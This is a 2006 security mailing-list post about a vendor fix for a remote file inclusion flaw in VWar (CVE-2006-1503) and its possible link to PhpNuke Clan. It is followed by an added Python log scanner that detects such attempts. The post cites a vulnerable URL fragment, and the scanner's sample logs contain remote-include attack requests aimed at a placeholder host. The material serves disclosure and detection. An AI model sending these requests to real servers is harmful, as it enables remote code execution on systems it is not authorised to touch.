[VIM] Vendor ACK for VWar issue - VWar used by PhpNuke Clan
Steven M. Christey
coley at mitre.org
Mon Apr 3 23:08:59 EDT 2006
Vendor has provided ACK and fix for CVE-2006-1503.

The front page of the VWar web site (http://www.vwar.de/) says:

  31.03.2006 18:07
  ATTENTION: MAJOR SECURITY UPDATE
  This vulnerability has been reported on securityfocus.com. We
  recommend to replace the file functions_install.php as soon as
  possible.
  fixed: XSS bug in functions_install.php which could allow malicious
  users to include a (remote) file and eg. execute php commands on the
  server hosting vwar

Obviously, the developer is referring to file inclusion and not "XSS".

Also, for those who care, the following PhpNuke Clan web announcement
shows that it uses VWar as a module:

http://www.codezwiz.com/article492-phpnuke-clan-210-has-been-released.html

  "PHPNUKE-CLAN.COM Release the new version of PNC! The version 2.1.0
  With VWAR & Server Viewer installed on it! The installation are
  simplified, more block for VWAR and JAG Online for the User Info
  blocks! "

This could be relevant for this Bugtraq post:

  BUGTRAQ:20060401 PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
  http://www.securityfocus.com/archive/1/archive/1/429615/100/0/threaded

since the demonstration URL here shows the VWar relationship:

  modules/vWar_Account/includes/functions_common.php?vwar_root2=

HOWEVER: since the include file and parameter name are different than
the originally reported vectors for VWar, this could be a separate issue.

PHPNuke Clan requires registration to download, and so does vWar, so I
didn't investigate any further.

- Steve
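As an added example (not part of the original post), a small Python check a site operator could run over web-server access logs to flag requests that hand a remote URL to the vwar_root2 parameter named above. The vwar_root parameter name, the include paths and the log lines are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Apr/2006:10:00:01 +0000] "GET /modules/vWar_Account/includes/functions_common.php?vwar_root2=http://198.51.100.9/x.txt HTTP/1.1" 200 512
198.51.100.7 - - [01/Apr/2006:10:00:02 +0000] "GET /modules/vWar_Account/index.php?page=1 HTTP/1.1" 200 2048
203.0.113.5 - - [01/Apr/2006:10:00:03 +0000] "GET /vwar/includes/functions_install.php?vwar_root=https://198.51.100.9/ HTTP/1.1" 200 300
192.0.2.4 - - [01/Apr/2006:10:00:04 +0000] "GET /modules/vWar_Account/includes/functions_common.php?vwar_root2=../../etc HTTP/1.1" 404 210
"""

# vwar_root2 is the parameter from the Bugtraq demonstration URL;
# vwar_root is an assumed sibling name, added here for illustration.
WATCHED_PARAMS = {"vwar_root", "vwar_root2"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_remote_include_attempt(target):
    """True when a watched parameter of a .php request carries a remote URL."""
    parsed = urlparse(target)
    if not parsed.path.endswith(".php"):
        return False
    qs = parse_qs(parsed.query, keep_blank_values=True)
    for name in WATCHED_PARAMS.intersection(qs):
        for value in qs[name]:
            if value.lower().startswith(REMOTE_SCHEMES):
                return True
    return False


def scan_log(text):
    """Return (ip, timestamp, target, status) for each flagged request line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_remote_include_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"),
                         m.group("target"), int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("remote include attempt:", hit)
```

The last sample line (a relative path rather than a URL) is deliberately not flagged by this check; local traversal attempts need a separate rule.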